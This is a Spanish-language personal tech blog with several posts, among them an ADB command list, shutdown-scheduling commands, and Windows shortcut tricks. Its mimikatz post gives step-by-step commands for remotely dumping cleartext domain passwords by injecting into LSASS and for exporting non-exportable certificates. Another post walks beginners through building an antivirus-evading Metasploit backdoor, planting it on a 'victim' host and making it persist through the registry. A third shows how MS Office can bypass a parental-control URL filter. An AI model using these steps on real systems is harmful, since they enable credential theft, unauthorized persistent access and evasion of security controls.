Mostrando entradas con la etiqueta Windows. Mostrar todas las entradas
Mostrando entradas con la etiqueta Windows. Mostrar todas las entradas

lunes, 1 de julio de 2013

ADB Terminal para android en windows



ADB son las siglas de Android Debug Bridge




Es una herramienta con la que podrás cacharriar Android desde el PC. Para poder utilizar ADB será necesario tener el ejecutable que se encuentra en el directorio <sdk>/platform-tools/ del SDK, este ejecutable lo podemos utilizar desde la consola de comandos de Windows cmd.exe con los siguientes parámetros.




>adb --help para ayuda

>adb version | para ver la versión de ADB

>adb start-server | iniciar el servidor ADB

>adb kill-server | terminar el servidor ADB

>adb get-serialno | mostrar el serial del telefono

>adb devices | para mostrar el numero de serie de los terminales conectados

>adb reboot | para reiniciar el terminal

>adb remount |  montar la particion /system para escritura

>adb root | reiniciar el servidor de adb con permisos de administrador

>adb reboot bootloader  | reiniciar y acceder al bootloader

>adb reboot recovery  |  reiniciar y acceder al modo recovery

>adb push <ruta local> <ruta remota>    |   copiar archivos/directorios PC a terminal

>adb pull <ruta remota> <ruta local>    |   copiar archivos/directorios terminal a PC




Instalar/Desinstalar aplicaciones

>adb install <archivo.apk>  |  para instalar aplicaciones fuera de los market oficiales

>adb install -r <archivo> |  manteniendo datos de aplicación

>adb uninstall <paquete>  | conservando datos de aplicación

>adb uninstall -k <paquete>  |  manteniendo datos de aplicación




Logs

>adb logcat [<filtrar-especifico>] >logcat.txt

>adb bugreport >report.txt    | guardar información del terminal




Shell

>adb shell     |   para acceder al terminal del telefono

>adb shell <comando>    |   para ejecutar un comando de terminal Android




Comandos Shell

ls, cd, mkdir, df, mount, remount, echo, chmod, getprop, exit...






Se pude descargar el ADB desde su pagina oficial:

Adb Driver - Universal Android USB Driver

y pueden ampliar su conocimiento en este post

Instalar ADB(Android Debugging Bridge) - Taringa!


Saludos

lunes, 13 de mayo de 2013

Programar apagado en LINUX y WINDOWS + Ejemplo en Java

No se si le ha pasado, pero en ocasiones queremos irnos adormir pero estamos descargando algo y no podemos apagar la maquina.
Muchas veces tenemos que esperar a que finalice la descarga para poder irnos a dormir o dejamos encendida la computadora toda la noche.

Bueno pues existen comando tanto en Linux como en Windows que nos permiten programar el tiempo que queremos que se apague nuestro ordenador:
Pongamos un ejemplo en Windows y otro en Linux:

Si queremos que nuestra maquina con Windows se apague en unos 15 minutos abrimos una consola (Cmd)
y escribimos:
  shutdown -s -t 1800 -f 
Donde los 1800 es el tiempo en segundos que se contaran hacia atrás para el apagado.


Si queremos que nuestra maquina con Linux se apague en unos 15 minutos abrimos una Terminal (alt+F2)
y escribimos:

$ sudo shutdown -h +30

Explico:

sudo (superusuario haga) shutdown (apagado) -h (halt) +30 (a los 15 minutos)

El +15 lo puede cambiar por el numero de minutos a los que quieres que se apague tu equipo.

Ahhh y algo mas, si son indecisos necesitaran la forma de cancelar el apagado y aquí esta el dato:

Windows abrir su cmd y escribir :
                                                 shutdown /a
Linux abrir su teminal y escribir:
                                               Sudo shutdown -c
Por cierto Linux tiene una aplicación para programar el apagado y se llama Gshutddown que se encuentra en los repositorios, solo ve a Sistema, Administracion, Gestor de paquetes Synaptic y ahí buscas Gshutdown y le das doble click para instalar.

Pero como soy algo curioso y tengo tiempo de sobra, el día de hoy me di a la tarea de crear un programita en java, para mi uso y para quien le sirva, claro no es la gran cosa, pero funciona, como dirían mis "compañeros" de la universidad.
El programa es capaz de reconocer entre que sistema operativo que es y programar el apagado del sistema en 15, 30 y 60 minutos.
Sin mas
Les dejo el link del .jar
http://www.mediafire.com/?fslnl26nobzijoa

Y el código en .zip (Use NetBeans IDE 7.2 con jdk 1.7)
http://www.mediafire.com/?el8c2jivbwzx4x8

Lógicamente necesitaran java para correr el .jar y sabrán como usando un poco a google.

Agradecería las mejoras y observaciones . =)

Próximamente are mejoras y las compartiré.

Saludos =)

lunes, 9 de julio de 2012

Volcado de contraseñas con mimikatz



mimikatz es una herramienta que entre otras características permite el volcado de contraseñas en texto claro de un sistema Windows, la exportación de certificados marcados como no exportables o la obtención de hashes de la SAM.




Una de las principales ventajas que presenta frente a otras herramientas como wce, es que aún no es demasiado popular y los antivirus no la detectan como aplicación maliciosa. Tan solo 5 de 41 la tienen catalogada como tal. ¡A ver lo que dura!








Para ver cómo funciona, mejor ver algunos ejemplos de uso.




1.- Nombre de usuario y PC

Para empezar y ver la sintaxis, algo sencillo. Obtención del nombre de usuario y el PC.




a.- Iniciar mimikatz desde la ruta en la que se haya descargado e invocar el módulo system con el comando "user" para sacar el nombre de usuario: system::user




b.- El nombre del equipo con el comando "computer" del módulo system:system::computer. Sencillo, ¿verdad?





2.- Contraseñas en claro de un dominio.

Como es lógico, es necesario tener permisos de administrador ya que la herramienta no explota ninguna vulnerabilidad de escalada de privilegios. En este ejemplo se hará uso junto a psexec de sysinternals para el uso remoto contra la dirección IP remota: 172.16.X.X




a.- Se autentica contra el servidor remoto (del que se volcarán las contraseñas) mediante el comando: net use \\172.16.X.X\admin$ que solicitará las credenciales.




b.- Se copia la librería auxiliar "sekurla.dll" en el directorio System32 del sistema remoto, proporcionada con el propio mimikatz: copy sekurla.dll \\172.16.X.X\admin$\system32




c.- El tercer paso es la ejecución de mimikatz, usando la arquitectura que corresponda, ya sea 32 o 64 bits: psexec /accepteula \\172.16.X.X\ -c mimikatz.exe




d.- Una vez arrancado se verifica que hay acceso al privilegio: SeDebugPrivilege, con el comando: privilege::debug aunque esto no es necesario si se tiene acceso SYSTEM.

e.- Se procede a inyectar la librería en el proceso de LSASS: inject::process lsass.exe sekurlsa.dll




f.- Por último, se solicitan las contraseñas con: @getLogonPasswords





Solucionar el problema no es sencillo, ya que requiere deshabilitar los Security Support Providers (SSP) TsPkg y Wdigest de la clave: HKLM\SYSTEM\CurrentControlSet\Control\LSA\Security Packages en caso de Windows 7 y 2008, opción no soportada por Microsoft y que rompe el Network Level Authentication (NLA) de RDP, dejando este de funcionar.




3.- Exportación de certificados.

Para exportar certificados, marcados como NO exportables, mimikatz parchea la CryptoApi y luego intenta la exportación. El ejemplo para mi equipo local:




a.- Se arranca mimikatz ejecutando el binario de la arquitectura que corresponda:C:\tmp\mimikatzz\x64\mimikatz




b.- Igual que en el caso anterior, se verifica el acceso a SeDebugPrivilege mediante:privilege::debug que debe responder "OK".




c.- Se procede al parcheo de la CryptoApi con el comando: crypto::patchcapi




d.- Se intentan exportar dos veces los certificados con la instrucción: crypto::exportCertificatespero falla, indicándolo con un resultado "KO".




e.- Cuando esto ocurre, hay que probar varias veces a parchear la cryptoapi y exportar, hasta que funciona tal y como muestra la captura. Dependiendo de la versión de Windows, será necesario usarcrypto::patchcapi o por el contrario crypto::patchcng





Referencias:

http://blog.opensecurityresearch.com/2012/06/using-mimikatz-to-dump-passwords.html

http://computer-forensics.sans.org/blog/2012/03/09/protecting-privileged-domain-accounts-disabling-encrypted-passwords#

http://blog.gentilkiwi.com/mimikatz

Leer más: Segu-Info: Volcado de contraseñas con mimikatz http://blog.segu-info.com.ar/2012/07/volcado-de-contrasenas-con-mimikatz.html#ixzz20AtcDPA0
Under Creative Commons License: Attribution Non-Commercial Share Alike

sábado, 31 de marzo de 2012

Windows 7 "Modo Dios"


Windows 7 tiene más de un "Modo Dios"

Los usuarios fueron tomados por sorpresa cuando apareció en la red un truco con el que era posible habilitar una sección oculta de Windows 7 bautizada como "Modo Dios". Básicamente cumpliendo el rol de un panel de control glorificado, esta sección contiene múltiples opciones de configuración en Windows 7 agrupadas en un solo lugar. Ahora hay más información al respecto, y parece ser que en realidad Windows 7 posee varios tipos de "Modos Dios" que pueden ser accedidos. Con un nombre para identificar el acceso directo, seguido de un punto y una cadena especial de caracteres, cualquier usuario podrá contar con estos modos en Windows 7, aunque en realidad no se debe esperar nada extraordinario de ellos.

  • La red brotó con información sobre el reciente Modo Dios descubierto en Windows 7. Mientras que en varios sitios se ha explicado que el término "Modo Dios" es simplemente cosmético, su popularidad ha hecho que permaneciera inalterado. Sin embargo, un reciente descubrimiento indica que el Modo Dios no es el único existente en Windows 7. Al parecer es posible crear accesos directos especiales para determinadas secciones del sistema operativo, utilizando cadenas específicas de caracteres como nombres para una nueva carpeta. El procedimiento para crearlas es exactamente el mismo que el explicado en el Modo Dios original, y hasta el momento no hemos notado ningún efecto nocivo en su utilización. Los únicos reportes de problemas vienen de usuarios utilizando versiones de 64 bits de Windows Vista, que al parecer también tiene su propio Modo Dios incorporado.
  • Algunos de los nuevos modos descubiertos, junto con el Modo Dios original Algunos de los nuevos modos descubiertos, junto con el Modo Dios original
    Algunos de los parámetros nos llevan directamente a funciones que pueden ser accedidas sin mayores inconvenientes desde el panel de control de Windows 7. Entre algunos de los "Modos Dios" hemos encontrado cosas tan simples como la configuración de consumo de energía, y algunas configuraciones para acceso remoto. Incluyendo al Modo Dios original, son un total de diecisiete los accesos directos que pueden ser creados. Un usuario lo suficientemente curioso puede tomarse la molestia de probarlos a todos, pero después de un rato es casi seguro que los borre debido a la poca utilidad que tienen, en comparación con el Modo Dios original reportado hace unos pocos días.
    A la hora de borrar los accesos, podrás ver sus descripciones A la hora de borrar los accesos, podrás ver sus descripciones
    Aquí les entregamos la lista completa de las cadenas que deben agregar al nombre de la carpeta. No olviden que deben asignar un nombre, seguido de un punto. Por ejemplo: "Prueba.{00C6D95F-329C-409a-81D7-C46C66EA7F33}". Esta es la lista:

    Nombre.{00C6D95F-329C-409a-81D7-C46C66EA7F33}.
    Nombre.{0142e4d0-fb7a-11dc-ba4a-000ffe7ab428}.
    Nombre.{025A5937-A6BE-4686-A844-36FE4BEC8B6D}.
    Nombre.{05d7b0f4-2121-4eff-bf6b-ed3f69b894d9}.
    Nombre.{1206F5F1-0569-412C-8FEC-3204630DFB70}.
    Nombre.{15eae92e-f17a-4431-9f28-805e482dafd4}.
    Nombre.{17cd9488-1228-4b2f-88ce-4298e93e0966}.
    Nombre.{1D2680C9-0E2A-469d-B787-065558BC7D43}.
    Nombre.{1FA9085F-25A2-489B-85D4-86326EEDCD87}.
    Nombre.{208D2C60-3AEA-1069-A2D7-08002B30309D}.
    Nombre.{20D04FE0-3AEA-1069-A2D8-08002B30309D}.
    Nombre.{2227A280-3AEA-1069-A2DE-08002B30309D}.
    Nombre.{241D7C96-F8BF-4F85-B01F-E2B043341A4B}.
    Nombre.{4026492F-2F69-46B8-B9BF-5654FC07E423}.
    Nombre.{62D8ED13-C9D0-4CE8-A914-47DD628FB1B0}.
    Nombre.{78F3955E-3B90-4184-BD14-5397C15F1EFC}.
    Nombre.{ED7BA470-8E54-465E-825C-99712043E01C}.     

    (Modo Dios original) (Panel de control total)

    Como siempre, tomen esto con pinzas. Lo último que queremos es que terminen con sus ordenadores en la órbita de Marte por culpa de alguno de estos modos, aunque debería ser relativamente seguro usarlos.

    Fuente:  CNET

sábado, 31 de diciembre de 2011

Backdoor indetectable generado con Metasploit

Todos a los que nos interesa el hacking y somos principiantes el generar un backdoor idetectable puede ser algo trabajoso he incluso frustrarte si no tenemos muchos conocimientos, acerca de el tema , por esa razón me gustaría compartirles la siguiente entrada en el blog que citare al final , y sin mas preámbulos aquí esta el post :



Muchas de las veces en las que se consigue acceso remoto a otro host mediante una vulnerabilidad explotada con Metasploit (por ejemplo) en la que conseguimos una shell con Meterpreter. Es bueno intentar dejar un backdoor por si queremos volver a acceder en un futuro.
La problemática de un backdoor instalado en la parte de la víctima es la detección del antivirus, que aunque no sea la panacea de la seguridad, cumple parte de su función.
Para que el ejecutable que dejaremos no sea detectado por el antivirus codificaremos el ejecutable con shitaka ga nai de Metasploit, tras conseguir acceso remoto en el equipo lo dejaremos en el equipo víctima, además pondremos una clave en el registro para que se inicie en cada inicio del sistema operativo.
Para hacer esta tarea, usaremos un script de SecurityLabs y The Hackers News que se llama Vanish, lo podemos descargar de aquí
Como dependencias para usar el script hemos de instalar las siguientes dependencias
root@bt:~# apt-get install mingw32-runtime mingw-w64 mingw gcc-mingw32 mingw32-binutils
Nos bajamos el script
Si queremos consultar el código fuente del script podemos también verlo en Pastebin
Una vez hemos descargado el script, si lo usamos en backtrack como es mi caso, lo hemos de copiar a la carpeta donde se encuentre Metasploit, es decir, /pentest/exploit/framework
Una vez lo hayamos copiado, lo ejecutamos, nos irá haciendo preguntas sobre la targeta de red, un número seed aleatorio y las veces que será encodeado con shitaka ga nai
























                    

El ejecutable se creará, nos hará una firma de hash del ejecutable, además de meterlo en una carpeta que se llama seclab






Para comprobar la fiabilidad de nuestro ejecutable lo subiremos a Virus Total, del que obtendremos una buena noticia dado el bajo ratio de detección:


El ratio de detección es muy bajo y eso nos permitirá el poder evadir la mayoría de antivirus
Como ya tenemos sesión con Meterpreter es sencillo el poder subir un archivo al host víctima






Le cambiado el nombre para que el archivo no se llame backdoor.exe :P
Ahora depende del atacante si quiere dejarlo así y enviar este ejecutable por email o ejecutarlo cada vez que vulnera la máquina o bien, puede añadir una entrada al registro para que se inicie en cada inicio de sistema operativo.
Luego desde la máquina atacante podemos hacer una conexión al host víctima




Podremos tener accesos remotos al equipo víctima tantas veces como deseemos con el backdoor generado.
En lo personal usando un backdor generado solo con el Metasploit , es detectable con los antivirus, pero abríamos de probar este escrib y compartir los resultados ...
Saludos a todos  :D
<---j@z--->

miércoles, 28 de diciembre de 2011

Navega sin "Navegador Web"

Navegar desde MS Office

Sin duda todos conocemos la paqueteria de oficina de microsoft Comento que la información que presento al encontré leyendo el el blog de "Un informatico en el lado del mal" todos los créditos sean para el autor..
sin mas por el momento les ofrezco la entrada original ...
Esta técnica ya la he probado y funciona al 100 Saludos ...

La historia radica en que desde los cuadros de diálogo de Windows es posible, en el nombre del archivo, utilizar una URL de Internet completa. Así, desde cualquier cuadro de dialogo, ya sea desde el bloc de notas, el Microsoft Excel o lo que tengas abierto en tu equipo, que haya invocado este componente de abrir que se ve en la figura siguiente puedes solicitar una URL de Internet.

Figura 1: Abriendo una URL de Internet desde el nombre de archivo


Esto, en el caso de Microsoft Office - y por supuesto nuestro querido Excel - en el que se puede seleccionar la opción de abrir documentos en formato página web, permite que se pueda navegar a cualquier URL, en este caso Mi blog.


Figura 2: Leyendo el post anterior 

El filtro de control parental en Internet Explorer y MS Office


Supongamos un entorno en el que tenemos un servidor solo con Internet Explorer en el que, por motivos de seguridad, se ha decidido capar toda URL de conexión mediante el filtro de contenido del Control Parental, como se ve en la figura siguiente.

Figura 3: Sitio bloqueado en Internet Explorer

En esa situación no sería posible usar el navegador para ir a ningún sitio, pero navegando con Word o Excel, se puede visitar cualquier página, aunque esté activo el control parental. 
                                      
                                 
Figura 4: sitio bloqueado visitado desde MS Word


Y pues así de facil es navegar por la web sin un navegador nativo y si logran entrar a su face de este modo.. avisenme.. xD
Saludos 


<--J@z-->